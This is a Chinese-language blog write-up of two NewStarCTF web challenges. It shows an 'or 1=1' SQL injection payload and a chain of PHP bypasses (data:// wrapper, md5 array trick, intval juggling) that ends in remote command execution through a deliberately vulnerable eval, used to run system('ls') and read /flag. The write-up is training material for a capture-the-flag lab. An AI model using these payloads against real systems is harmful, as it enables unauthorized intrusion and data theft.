【buuctf】 NewStarCTF 公开赛赛道 web:Word-For-You、NotPHP

已于 2022-10-04 18:01:53 修改
阅读量2k 收藏 8
点赞数 2
分类专栏: 【buuctf】 NewStarCTF 公开赛赛道 文章标签: php 安全 web安全
于 2022-09-22 20:57:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46497491/article/details/126998485
版权

Word-For-You

思路:

看一下提示:
赛博顶针先生悄悄把flag告诉了Mr.H,Mr.H为了确保安全把flag放到了数据库中,你能找到吗?(第一次做的时候没看提示,刚开始以为是xss,耗费了挺多时间的,写笔记时候看到了提示,感觉提示挺重要的) 

根据提示可能是一个sql注入,所以翻看翻看,有很多框框,看似可以注入,找找有没有简单的get方式传参数的,因为get可能比较简单吧。

一共三个页面,在最后的查看留言的页面找到了一个变量,name尝试一下注入,flag就在这个页面内。

下面开始:

1、看看是数字型吗,直接:1 and 1=1 --+

 因为内容直接显示到了页面上,所以猜测可能是字符型的

2、加个单引号:1'and 1=1

3、 也不行,后面加个--+注释一下:1'and 1=1 --+

4、还是不行,只能猜测一下可能是and的问题,换个方法: 1'or 1=1--+

 这下一下子就出来了,没用查询语句啥的倒是挺让人开心的,目前就是这样做的。

 (有个小细节,如果在页面上不能直接复制,就在flag上面,右键检查,就能直接找到html中的flag再复制,挺方便的)

WEB:NotPHP

先看看题目:看php代码,想到的就是,完成三个if语句,最后能够执行一句话,从而getshell,执行命令,然后找到flag。其中三个if,分别是三个绕过。

<?php
error_reporting(0);
highlight_file(__FILE__);
if(file_get_contents($_GET['data']) == "Welcome to CTF"){
    if(md5($_GET['key1']) === md5($_GET['key2']) && $_GET['key1'] !== $_GET['key2']){
        if(!is_numeric($_POST['num']) && intval($_POST['num']) == 2077){
            echo "Hack Me";
            eval("#".$_GET['cmd']);
        }else{
            die("Number error!");
        }
    }else{
        die("Wrong Key!");
    }
}else{
    die("Pass it!");
} Pass it!

1、从最外层开始:需要实现get得到的data值能够与Welcome to CTF完全相等

(file_get_contents($_GET['data']) == "Welcome to CTF")

这边因为我也是小白就不细讲了,如果需要可以详细的研究研究这些函数,大致说一下:file_get_contents()应该是存在漏洞,能够通过伪协议,来构造使得data值能够与Welcome to CTF完全相等。

构造的语句:http://url/?data=data://text/plain;base64,V2VsY29tZSB0byBDVEY

其中:V2VsY29tZSB0byBDVEY是Welcome to CTF通过base64加密的来的。

执行结果:

第一个if成功绕过, 输出了Wrong Key!语句

2、第二层:这一层是一个md5绕过,主要内容是实现key1与key2初始值不同,同时满足md5加密后的值相等。

(md5($_GET['key1']) === md5($_GET['key2']) && $_GET['key1'] !== $_GET['key2'])

这个题也很常见,实现方法就是使得key1,key2分别为两个不同的数字,php的md5函数无法处理数组,所以返回的会是null()

构造语句:http://url/?data=data://text/plain;base64,V2VsY29tZSB0byBDVEY=&key1[]=1&key2[]=3

执行结果:

 3、第三层:这边是两个函数,is_numeric()与intval(),is_numeric():数字和数字字符串则返回 TRUE,否则返回 FALSE。要使!is_numeric()为真就得使得is_numeric()为假,所以num的值应该数字或者数字字符串。ntval()函数为取证函数,根据题意需要取整后等于2077.取整的字符串,取决于字符串最左侧的字符,遇到字母结束,所以最后使用:2077b来绕过

(!is_numeric($_POST['num']) && intval($_POST['num']) == 2077)

 构造语句:num=2077s(这地方需要post传参)

执行结果:

4、最后,刚从刚刚的地方爬起来,我又摔倒了。

 cmd=system('ls');   语句不能执行,心态炸裂,我是大菜鸡!!!!

最后请教了我的好哥哥,我的好哥哥说:因为eval("#".$_GET['cmd']);这个地方是#号,需要闭合才能执行后面的变量

这地方需要构造语句(同时还需要post传参):
http://url/?data=data://text/plain;base64,V2VsY29tZSB0byBDVEY=&key1[]=1&key2[]=3&cmd=?><?=system('ls');

执行结果:

5、最最后,在ls处,执行语句就可以了,pwd看看路径,ls / 看看根下面有啥,最后找到了在根下,有个flag,cat /flag,就找到了

 

完工,这题我个人认为,是这几个题目中最难的,感觉挺麻烦的,不过最终终于搞出来了,很开心,我是大菜鸡,拜拜,下班! 

L_ergo
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 8
    评论
专栏目录
菜鸡做题·20200418会员登陆页面(CTF
wengbinqiang17的博客
04-18 1万+
题目地址:http://129.204.207.114 用火狐浏览器打开网址 对于登录框 一般思路是 •爆破,一般的题目用户名都是admin •Sql注入 •信息泄露 F12查看网页源代码 得到账号密码 账号:admin 密码:welcome_to_ctf 登录,进入flag.php页面 当我们成功登录时就能将flag.txt的内容写进session了,而且会将对应的$_SESSION['us...
消歧:OAG-WhoIsWho赛道二代码分享
02-04
名称消除歧义在OAG-WhoIsWho赛道二中取得验证集0.86299,测试集0.96405的成绩,分享本次比赛中的代码。比赛环境Ubuntu 1804 python3.6所使用到的python包及版本见requirements.txt运行前目录结构disambiguation/├─...
2022NewStarCTF pwn大部分题解
m0_51251108的博客
11-18 1729
今年9~10月的比赛,题目从易到难,知识面广,还是很不错的,复现一下这比赛的pwn。
NewStarCTF 2024 公开赛道 Week1,2024年最新31道网络安全面试题
最新发布
2401_83946722的博客
04-13 963
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
BUUCTF NewStarCTF一些新知识记录
Aiwin的博客
09-21 3079
BUUCTF NewStarCTF一些新知识记录
NewStarCTF week2 部分题解
Aiwin的博客
09-29 3163
NewStarCTF week2 尽力的某些题解
NewStarCTF 2022 web方向题解 wp
Jay17的博客
08-29 2617
NewStarCTF 2022 web方向题解 wp
qb-lapraces:QB-Core的赛道创建
04-11
【QB-Core赛道创建详解】 QB-Core是一个基于Lua脚本语言的游戏框架,主要用于赛车游戏的开发。Lua是一种轻量级、高性能、专注于嵌入式使用的解释型编程语言,因其简洁的语法和强大的功能,在游戏开发领域得到了广泛...
华为中国大学生ICT大赛-网络技术赛道-WLAN知识资料
09-22
《华为中国大学生ICT大赛-网络技术赛道-WLAN知识资料》 在当今信息化社会,无线局域网(WLAN)已经成为我们日常生活和工作中不可或缺的一部分。华为作为全球领先的ICT解决方案提供商,其主办的“华为中国大学生ICT...
Lets-Race:vs-racer - 基于 android libgdx 的多人赛车游戏
06-21
游戏设计方面,"让我们赛跑"很可能包含了多种赛道、赛车选择以及个性化的游戏模式,比如竞速、计时赛、淘汰赛等。这些元素增加了游戏的可玩性和重玩价值。此外,可能还有积分系统、排名榜等,激励玩家不断提高自己的...
gucs-wiki:Wiki for Google Udacity Challenge Scholarship 2018-移动网络专家赛道
05-16
Google Udacity挑战奖学金2018 移动网络专家跟踪Wiki Google Udacity挑战奖学金2018-移动网络专家轨道的分类明确且全面的指南。 指数 一般的 活动 ES6测验 ES6测验2.0 GitHub测验1.0 GitHub测验2.0 ...
BUUCTF NewStarCTF 公开赛赛道Week3 Writeup
末初的CSDN博客
10-09 5494
BUUCTF NewStarCTF 公开赛赛道Week3 Writeup
PHP中的MD5()函数漏洞
John_lain的博客
10-28 3611
文章目录1. MD5函数漏洞2.PHP特性3.MD5碰撞 1. MD5函数漏洞 $_GET['a'] != $_GET['b'] &amp;&amp; MD5($_GET['a']) == MD5($_GET['b']) 要让上面的等式成立,a和b的值不能相等,但是md5后的值相等。因为是==比较,只判断值是否相等,不判断类型是否相同。如果类型不同先转换为相同类型再进行比较而PHP在处理哈希字...
NewStarCTF week5 web 部分题解
qq_60829702的博客
10-23 511
[NewStarCTF] Give me your photo PLZ、Unsafe Apache、So Baby RCE Again、BabySSTI_Three解题记录以及心得体会
NewStarCTF 2023 WEEK1 Crypto
qq_63577068的博客
10-02 601
key=16*8*2=256bit,iv=16*8=128bit,256^128bit说明key的高位128bit不变,所以通过xor高128bit得到高位key的值*2还原key,iv=key^xor^1。每一个明文异或key,得到密文。最主要是要知道key值,就能逆推明文,一种就是,已知明文头是“flag”,用0xe9^ord("f"),0xe3^ord("l")得到key=143。凯撒密码,已知flag的头,kqfl->flag 相当于向前移动5位,key=5,得到。Brainfuck解密。
NewStarCTF 2023 公开赛道 Week1
Fab1an的博客
10-02 2620
首先要通过Level 1 ,发现它是PHP的弱类型比较,只要两个数的md5加密后的值以0e开头就可以绕过,因为php在进行弱类型比较(即==)时,会先转换字符串的类型,再进行比较,而在比较时因为两个数都是以0e开头会被认为是科学计数法,0e后面加任何数在科学计数法中都是0,所以两数相等。数组为空,那么MD5加密之后都为0,那么就是相等的,满足条件,可以成功绕过。那么接下来需要绕过if(!打开之后,是一个登录界面,试一下管理员账号admin,密码123456,登录失败,那么我们抓包,然后爆破一下密码。
NewStarCTF 公开赛赛道 第二周学习记录
m0_64815693的博客
10-03 2363
NewStarCTF 公开赛赛道 第二周学习记录
[NewStarCTF 2023] web题解
热门推荐
rev1ve的博客
10-16 1万+
分析一下,第一个if语句判断条件为上传的password参数的MD5值前六位为c4d038;和反引号去绕过对system函数的过滤,反斜杠绕过flag,tac替换cat命令。(多次尝试,发现回显的位置在5而不是1,开始卡了很久没回显)简单的文件包含,这里过滤了常见的转换过滤器base和rot。打开题目,发现是小游戏(题目跟最近打的SHCTF比较像)我们丢到重放器,发现是页面302状态,并且出现了提示。(这里用XFF不行,我用的是X-Real-IP)打开题目,提示我们传参两个数,然后帮我们计算。
个人的BUUCTF_Re之旅 SimpleRev_wp
weixin_62586193的博客
12-15 1158
把文件下载,用010 Editor打开,看到: 自然就知道这是个elf文件,而且是64位的,拖进ida看看: int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { int v3; // eax char v4; // [rsp+Fh] [rbp-1h] while ( 1 ) { while ( 1 ) { printf("Welcome to C..
NewStarCTF 2023 第一阶段公开赛道部分wp
10-02
这是官方的wp文件,需要的可以下载查看

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值